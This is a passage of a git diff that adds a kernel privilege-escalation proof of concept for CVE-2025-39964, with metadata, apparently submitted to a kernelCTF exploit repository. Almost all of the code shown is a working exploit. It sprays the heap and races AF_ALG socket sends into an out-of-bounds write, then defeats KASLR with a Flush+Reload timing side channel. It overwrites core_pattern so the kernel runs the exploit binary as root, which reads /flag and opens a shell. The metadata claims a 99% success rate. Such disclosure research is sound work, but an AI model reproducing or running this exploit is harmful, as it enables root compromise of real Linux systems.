+ * Step 5a: Map the full userspace range [SCAN_START_ADDR, SCAN_END_ADDR) with
+ * physical pages in MAP_CHUNK_SIZE (2 GB) chunks. When sg[-1].page_link is
+ * crafted with a value near 0, the kernel's page_address() computation wraps
+ * around and the OOB write destination lands somewhere within this region.
+ * Mapping real pages here means the write silently succeeds (our oracle),
+ * letting us binary-search for the exact physical page by progressively
+ * munmap-ing halves of this range.
+ */
+void allocate_map() {
+ char *start = (void *)SCAN_START_ADDR;
+ while (1) {
+ start = SYSCHK(mmap(start, MAP_CHUNK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_SHARED | MAP_ANON | MAP_FIXED, -1, 0));
+ start += MAP_CHUNK_SIZE;
+ if ((size_t)start >= SCAN_END_ADDR)
+ break;
+ }
+}
+
+/*
+ * Step 5b: Use mincore to find the exact virtual address in [start, start+4GB)
+ * that corresponds to the physical page the OOB write targets. A page marked
+ * resident (mincore bit = 1) that also contains our spray marker ('a') is the
+ * hit: it is the page that the kernel's arbitrary-write wrote into.
+ */
+size_t search_offset(char *start) {
+ char *pvec = NULL;
+ for (int i = 0; i < MAX_SCAN_ITERATIONS; i++) {
+ mincore((void *)start, 0x100000000ULL, vec);
+ pvec = memchr(vec, 1, 0x100000);
+ if (pvec) {
+ char *leak_offset = start + (pvec - vec) * 0x1000;
+ pvec = memchr((void *)leak_offset, 'a', 0x1000);
+ if (pvec)
+ break;
+ }
+ start += 0x100000000ULL;
+ }
+ if (pvec == NULL)
+ exit(0);
+ printf("\npvec %p %x\n", pvec, pvec[0]);
+ return (size_t)pvec;
+}
+
+int check_core() {
+ /* Check if /proc/sys/kernel/core_pattern has been overwritten */
+ char core_pattern_buf[0x100] = {};
+ int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+ read(core, core_pattern_buf, sizeof(core_pattern_buf));
+ close(core);
+ return strncmp(core_pattern_buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+void crash(char *cmd) {
+ int memfd = memfd_create("", 0);
+ /* send our binary to memfd for core_pattern payload */
+ SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+ /* our binary now at file descriptor 666 */
+ dup2(memfd, 666);
+ close(memfd);
+ while (check_core() == 0)
+ sleep(1);
+ puts("Root shell !!");
+ /* Trigger program crash and cause kernel to execute program from core_pattern
+ * which is our "root" binary */
+ *(size_t *)0 = 0;
+}
+
+size_t bypass_kaslr(u64 base);
+
+int guess_addr(size_t guesss) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = guesss;
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'b';
+ int x = send(opfd, buf, 1, MSG_MORE);
+ printf("x: %d\n", x);
+ return x == 1;
+}
+
+int trigger_exploit();
+int main(int argc, char **argv) {
+
+ setvbuf(stdin, 0, 2, 0);
+ setvbuf(stdout, 0, 2, 0);
+ puts("Exploit start");
+ if (argc == 1) {
+ size_t stext = 0;
+ if (getenv("KTEXT"))
+ stext = strtoull(getenv("KTEXT"), 0, 16);
+ else
+ stext = bypass_kaslr(0);
+ /* core_pattern symbol is at a fixed offset from _stext */
+ core_pattern = stext + CORE_PATTERN_MIT_OFFSET;
+ printf("got stext 0x%zx 0x%zx\n", stext, core_pattern);
+ }
+
+ struct rlimit rlim = {.rlim_cur = 0xf000, .rlim_max = 0xf000};
+ setrlimit(RLIMIT_NOFILE, &rlim);
+
+ if (argc > 1) {
+#define SYS_pidfd_getfd 438
+ int pid = strtoull(argv[1], 0, 10);
+ int pfd = syscall(SYS_pidfd_open, pid, 0);
+ int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+ int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+ int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+ dup2(stdinfd, 0);
+ dup2(stdoutfd, 1);
+ dup2(stderrfd, 2);
+ /* Run cat /flag multiple times to ensure output is flushed before reboot */
+ for (int i = 0; i < 6; i++)
+ system("cat /flag");
+
+ system("cat /flag;echo o>/proc/sysrq-trigger");
+ execlp("bash", "bash", NULL);
+ }
+ /* Step 7: fork a watcher that polls core_pattern and triggers crash once
+ * overwritten */
+ if (fork() == 0) {
+ set_cpu(0);
+ setsid();
+ crash("");
+ }
+ /* Retry loop: trigger_exploit() may fail the race; restart on failure */
+ while (1) {
+ if (fork() == 0) {
+ trigger_exploit();
+ exit(0);
+ }
+ wait(NULL);
+ }
+}
+
+int trigger_exploit() {
+ int tfmfd;
+
+ set_cpu(1);
+ SYSCHK(socketpair(AF_UNIX, SOCK_STREAM, 0, cfd));
+
+ /* Step 1: spray heap with crafted msg_control buffers */
+ spray_unix_sockets();
+
+ char *addr = SYSCHK(mmap(0, MMAP_REGION_LEN, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANON, -1, 0));
+ struct iovec local = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+ struct iovec remote = {.iov_base = addr, .iov_len = MMAP_REGION_LEN};
+
+ struct sockaddr_alg sa = {
+ .salg_family = AF_ALG,
+ .salg_type = "skcipher", /* symmetric key cipher */
+ .salg_name = "cbc(aes)", /* AES in CBC mode */
+ };
+
+ /* Step 2: create and bind the AF_ALG transformation socket */
+ tfmfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
+ if (tfmfd == -1) {
+ perror("socket");
+ return 1;
+ }
+
+ if (bind(tfmfd, (struct sockaddr *)&sa, sizeof(sa)) != 0) {
+ perror("bind");
+ close(tfmfd);
+ return 1;
+ }
+
+ unsigned char key[32] = {0};
+ if (setsockopt(tfmfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) != 0) {
+ perror("setsockopt");
+ close(tfmfd);
+ return 1;
+ }
+
+ opfd = accept(tfmfd, NULL, 0);
+ if (opfd == -1) {
+ perror("accept");
+ close(tfmfd);
+ return 1;
+ }
+
+ int val = 0x1000;
+
+ struct {
+ struct cmsghdr cmsg;
+ __u32 op;
+ __u32 ivlen;
+ unsigned char iv[16];
+ } __attribute__((__packed__)) msg;
+
+ memset(&msg, 0, sizeof(msg));
+ msg.cmsg.cmsg_level = SOL_ALG;
+ msg.cmsg.cmsg_type = ALG_SET_OP;
+ msg.cmsg.cmsg_len = CMSG_LEN(sizeof(__u32) + sizeof(__u32) + 16);
+
+ msg.op = ALG_OP_ENCRYPT;
+ msg.ivlen = 16;
+ memset(msg.iv, 0x01, 16);
+
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = 0x1000,
+ };
+
+ struct msghdr msgh;
+ memset(&msgh, 0, sizeof(msgh));
+ msgh.msg_iov = &iov;
+ msgh.msg_iovlen = 1;
+ msgh.msg_control = &msg;
+ msgh.msg_controllen = msg.cmsg.cmsg_len;
+
+ /* Step 3: initial sendmsg to initialise the tsgl; advances sgl->cur to 1 */
+ ssize_t n = sendmsg(opfd, &msgh, MSG_MORE);
+ printf("init %ld\n", n);
+
+ /*
+ * Step 3 (cont): advance sgl->cur from 1 to 124 (MAX_SGL_ENTS - 2) using
+ * SGL_MERGE_ITERATIONS = 0x7b send+recv pairs. Each send allocates one sg
+ * entry (cur++); each recv drains the processed entry so the socket stays
+ * writable. The loop comment in the original PR is:
+ * "the loop with 0x7b + the sendmsg and send calls executes 125 times,
+ * matching MAX_SGL_ENTS - 1 = 126 - 1 = 125."
+ */
+ for (int i = 0; i < SGL_MERGE_ITERATIONS; i++) {
+ SYSCHK(send(opfd, buf, 0x1000, MSG_MORE));
+ n = recv(opfd, buf, 0x1000, 0);
+ }
+
+ /* Advance sgl->cur to 125 = MAX_SGL_ENTS - 1 (one slot before the list is
+ * full) */
+ send(opfd, buf, 0x1000, MSG_MORE);
+ SYSCHK(setsockopt(opfd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val)));
+ printf("setsockopt done\n");
+
+ /*
+ * Step 3 (race): fork two children that race each other:
+ *
+ * Child A (send invalid addr): passes INVALID_USER_ADDR, which causes
+ * af_alg_alloc_tsgl() to allocate a new tsgl (sgl->cur → 0) then fail
+ * in memcpy_from_msg() — leaving ctx->merge = 1 and sgl->cur = 0.
+ *
+ * Child B (send 0x200 bytes): sends a sub-page-size buffer so that
+ * ctx->merge is set to 1 and sgl->cur advances to MAX_SGL_ENTS = 126.
+ *
+ * Desired outcome: both children finish such that ctx->merge == 1 AND the
+ * last tsgl has sgl->cur == 0. The next send() will then use sg[-1].
+ */
+ if (fork() == 0) {
+ /* Child A: trigger new-tsgl allocation then fail — sets sgl->cur = 0 */
+ int x = send(opfd, INVALID_USER_ADDR, 0x400, MSG_MORE);
+ printf("send3 %d\n", x);
+ exit(0);
+ }
+
+ if (fork() == 0) {
+ /* Child B: sub-page send sets ctx->merge = 1 and fills sgl->cur to
+ * MAX_SGL_ENTS */
+ int x = send(opfd, buf, 0x200, MSG_MORE);
+ printf("send2 %d\n", x);
+ exit(0);
+ }
+
+ /*
+ * @sleep(desc="wait for both fork children to reach their send() calls and
+ * set ctx->merge=1 with sgl->cur=0 before we recv()")
+ */
+ sleep(1);
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+ wait(NULL);
+
+ /* Step 4: release spray threads so they re-send their crafted payloads */
+ for (int i = 0; i < THREAD_NUM; i++) {
+ write(cfd[1], buf, 1);
+ }
+
+ n = recv(opfd, buf, 0x1000, 0);
+ printf("recv2 %ld\n", n);
+
+ memset(buf, 'z', 0x1000);
+ wait(NULL);
+
+ /* Step 5: map userspace oracle region for the binary search */
+ allocate_map();
+
+ /* Step 5 (OOB trigger): with ctx->merge=1 and sgl->cur=0 this send uses
+ * sg[-1].page_link from our sprayed payload — triggering the OOB write.
+ * Returns -1 if the write destination is unmapped (race failed); 1 if mapped.
+ */
+ int x = send(opfd, buf, 1, MSG_MORE);
+
+ if (x == 1) {
+ puts("Race fail");
+ exit(0);
+ }
+
+ /*
+ * Step 5 (binary search oracle):
+ *
+ * Background:
+ * sg[-1].page_link is effectively a pointer to a struct page in vmemmap.
+ * The kernel computes the write destination as:
+ * dest = page_address(sg_page(sg)) + sg->offset + sg->length
+ * = page_offset_base + (page_link - vmemmap_base) / 64 * PAGE_SIZE
+ * + offset + length
+ * With page_link ≈ 0, the pfn arithmetic wraps to a very large value, and
+ * (page_offset_base + pfn * PAGE_SIZE) wraps further to land within our
+ * userspace oracle region [SCAN_START_ADDR, SCAN_END_ADDR).
+ *
+ * Oracle:
+ * send() returns 1 → the write destination is in a mapped page (success).
+ * send() returns -1 → the destination is unmapped (copy_from_user failed).
+ * By progressively munmap-ing halves of the oracle region we can determine
+ * which physical page corresponds to the OOB write target.
+ *
+ * Binary search (8 iterations → narrows range from SCAN_END_ADDR to ~340 MB):
+ * Each iteration j tests: "if I decrease page_link by half_range/64, does
+ * the write still succeed?"
+ * - Decreasing page_link by Δ shifts dest by Δ*64 bytes (since each
+ * struct-page unit = 64 bytes = one PAGE_SIZE/64 step in physmap).
+ * - The test delta (SCAN_END_ADDR >> (7+j)) in page_link units equals
+ * half_range = (SCAN_END_ADDR >> (1+j)) in dest-address units.
+ * If the shifted oracle still succeeds → dest is in the *upper* half →
+ * unmap the lower half and advance start.
+ * Otherwise → dest is in the *lower* half → unmap the upper half.
+ */
+ size_t oracle;
+ size_t leak_offset = 0;
+ int xcnt = 0;
+ for (int k = 0; k < MAX_SCAN_ITERATIONS; k++) {
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] -= (SCAN_END_ADDR >> 6);
+ write(cfd[1], buf, 0x100);
+ buf[0] = 'a';
+ x = send(opfd, buf, 1, MSG_MORE);
+ if (x == 1) {
+ puts("");
+ xcnt++;
+ oracle = *(size_t *)&payload[PAYLOAD_OFFS_TARGET];
+ char *start = (void *)(0ULL);
+ for (int j = 0; j < 8; j++) {
+ printf("loop j: %d\n", j);
+ x = guess_addr(oracle - (SCAN_END_ADDR >> (7 + j)));
+ if (x == 1) {
+ xcnt++;
+ start += (SCAN_END_ADDR >> (1 + j)); /* upper half */
+ munmap(start - (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ } else {
+ munmap(start + (SCAN_END_ADDR >> (1 + j)),
+ (SCAN_END_ADDR >> (1 + j)));
+ }
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ /* search_offset returns the exact userspace VA of the OOB-written page */
+ leak_offset = search_offset(start) + xcnt;
+ printf("leak_offset %zx\n", leak_offset);
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+
+ break;
+ }
+ }
+
+ if (leak_offset == 0)
+ exit(0);
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] = oracle;
+ write(cfd[1], buf, 0x100);
+
+ /*
+ * Step 6: redirect the OOB write to core_pattern.
+ *
+ * leak_offset is the VA of the currently-targeted physical page.
+ * core_pattern is the KASLR-adjusted kernel VA of core_pattern[].
+ *
+ * First, align within-page: send adjust_offset bytes so that after the
+ * advance the write starts at the same within-page offset as core_pattern.
+ */
+ size_t adjust_offset =
+ PAGE_SIZE + (core_pattern & PAGE_MASK) - (leak_offset & PAGE_MASK);
+ leak_offset += adjust_offset;
+
+ memset(buf, 'z', 0x1000);
+ SYSCHK(send(opfd, buf, adjust_offset - 1, MSG_MORE));
+ SYSCHK(send(opfd, buf, 1, MSG_MORE));
+
+ printf("sg->len overflow check %x\n", *(char *)(leak_offset - 1));
+ if (*(char *)(leak_offset - 1) != 'z')
+ leak_offset -= 0x100000000ULL;
+
+ for (int i = 0; i < THREAD_NUM; i++) {
+ read(sfd[i][0], buf, 0x1000);
+ read(cfd[1], buf, 1);
+ }
+
+ /*
+ * Now adjust payload[PAYLOAD_OFFS_TARGET] (= sg[-1].page_link) so that
+ * page_address(sg_page(sg)) points to the physical page holding core_pattern.
+ * The >> 6 (or / 64) is actually a simplification of the formula
+ * (addr / 0x1000) * 64. We divide the address by 0x1000 to find the page
+ * index, and then multiply by 64 because each memory page has a page_struct
+ * that is exactly 64 bytes long.
+ * payload[PAYLOAD_OFFS_TARGET] is sg[-1].page_link, which controls dest via
+ * the formula described in the binary search comment above.
+ */
+
+ *(size_t *)&payload[PAYLOAD_OFFS_TARGET] +=
+ (((core_pattern & ~0xfff) - (leak_offset & ~0xfff)) >> 6);
+
+ printf("%zx\n", *(size_t *)&payload[PAYLOAD_OFFS_TARGET]);
+ write(cfd[1], buf, 0x100);
+ /* Step 6 (write): send the core_pattern string; kernel copies it to
+ * core_pattern[] */
+ char mcore[64] = "|/proc/%P/fd/666 %P";
+ SYSCHK(send(opfd, mcore, 64, MSG_MORE));
+ PAUSE;
+
+ return 0;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_begin() {
+ uint64_t a, d;
+ asm volatile("mfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+inline __attribute__((always_inline)) uint64_t rdtsc_end() {
+ uint64_t a, d;
+ asm volatile("xor %%rax, %%rax\n\t"
+ "lfence\n\t"
+ "RDTSCP\n\t"
+ "mov %%rdx, %0\n\t"
+ "mov %%rax, %1\n\t"
+ "mfence\n\t"
+ : "=r"(d), "=r"(a)
+ :
+ : "%rax", "%rbx", "%rcx", "%rdx");
+ a = (d << 32) | a;
+ return a;
+}
+
+void prefetch(void *p) {
+ asm volatile("prefetchnta (%0)\n"
+ "prefetcht2 (%0)\n"
+ :
+ : "r"(p));
+}
+
+size_t flushandreload(void *addr) /* row miss */
+{
+ size_t time = rdtsc_begin();
+ prefetch(addr);
+ size_t delta = rdtsc_end() - time;
+ return delta;
+}
+
+/*
+ * KASLR bypass via Flush+Reload side channel.
+ *
+ * Uncomment KASLR_BYPASS_INTEL for Intel CPUs (kernelCTF remote instances).
+ * Keep commented for GitHub CI (AMD/other) to use the sliding-window variant.
+ * Alternatively pass -DKASLR_BYPASS_INTEL to the compiler without touching
+ * source.
+ */
+// #define KASLR_BYPASS_INTEL
+size_t bypass_kaslr(u64 base) {
+ if (!base) {
+#ifdef KASLR_BYPASS_INTEL
+#define OFFSET 0
+#define START (0xffffffff81000000ull + OFFSET)
+#define END (0xffffffffD0000000ull + OFFSET)
+#define STEP 0x0000000001000000ull
+ while (1) {
+ u64 bases[7] = {0};
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ size_t minv = ~0;
+ size_t mini = -1;
+ for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) {
+ if (times[ti] < minv) {
+ mini = ti;
+ minv = times[ti];
+ }
+ }
+
+ if (mini < 0) {
+ return -1;
+ }
+
+ bases[vote] = addrs[mini];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ base -= OFFSET;
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#else
+#define START (0xffffffff81000000ull)
+#define END (0xffffffffc0000000ull)
+#define STEP 0x0000000000200000ull
+#define NUM_TRIALS 9
+/* largest contiguous mapped area at the beginning of _stext */
+#define WINDOW_SIZE 11
+
+ while (1) {
+ u64 bases[NUM_TRIALS] = {0};
+
+ for (int vote = 0; vote < ARRAY_LEN(bases); vote++) {
+ size_t times[(END - START) / STEP] = {};
+ uint64_t addrs[(END - START) / STEP];
+
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ times[ti] = ~0;
+ addrs[ti] = START + STEP * (u64)ti;
+ }
+
+ for (int i = 0; i < 16; i++) {
+ for (int ti = 0; ti < ARRAY_LEN(times); ti++) {
+ u64 addr = addrs[ti];
+ size_t t = flushandreload((void *)addr);
+ if (t < times[ti]) {
+ times[ti] = t;
+ }
+ }
+ }
+
+ uint64_t max = 0;
+ int max_i = 0;
+ for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) {
+ uint64_t sum = 0;
+ for (int i = 0; i < WINDOW_SIZE; i++) {
+ sum += times[ti + i];
+ }
+ if (sum > max) {
+ max = sum;
+ max_i = ti;
+ }
+ }
+
+ bases[vote] = addrs[max_i];
+ }
+
+ int c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (c == 0) {
+ base = bases[i];
+ } else if (base == bases[i]) {
+ c++;
+ } else {
+ c--;
+ }
+ }
+
+ c = 0;
+ for (int i = 0; i < ARRAY_LEN(bases); i++) {
+ if (base == bases[i]) {
+ c++;
+ }
+ }
+ if (c > ARRAY_LEN(bases) / 2) {
+ goto got_base;
+ }
+
+ printf("majority vote failed:\n");
+ printf("base = %llx with %d votes\n", base, c);
+ }
+#endif
+ }
+
+got_base:
+
+ printf("using kernel base %llx\n", base);
+
+ return base;
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json
new file mode 100644
index 000000000..304179dc7
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/metadata.json
@@ -0,0 +1,34 @@
+{
+ "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+ "submission_ids": [ "exp413","exp415"],
+ "vulnerability": {
+ "cve": "CVE-2025-39964",
+ "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1b34cbbf4f011a121ef7b2d7d6e6920a036d5285",
+ "affected_versions": ["2.6.36 - 6.16"],
+ "requirements": {
+ "attack_surface": [],
+ "capabilities": [],
+ "kernel_config": ["CONFIG_CRYPTO_USER_API"]
+ }
+ },
+ "exploits": {
+ "lts-6.12.44": {
+ "environment": "lts-6.12.44",
+ "uses": [],
+ "requires_separate_kaslr_leak": false,
+ "stability_notes": "99% success rate"
+ },
+ "mitigation-v4-6.6": {
+ "environment": "mitigation-v4-6.6",
+ "uses": [],
+ "requires_separate_kaslr_leak": false,
+ "stability_notes": "99% success rate"
+ },
+ "cos-121-18867.199.28": {
+ "environment": "cos-121-18867.199.28",
+ "uses": [],
+ "requires_separate_kaslr_leak": false,
+ "stability_notes": "99% success rate"
+ }
+ }
+}
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz
new file mode 100755
index 000000000..07252dbed
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp413.tar.gz differ
diff --git a/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz
new file mode 100755
index 000000000..07252dbed
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-39964_lts_cos_mitigation/original_exp415.tar.gz differ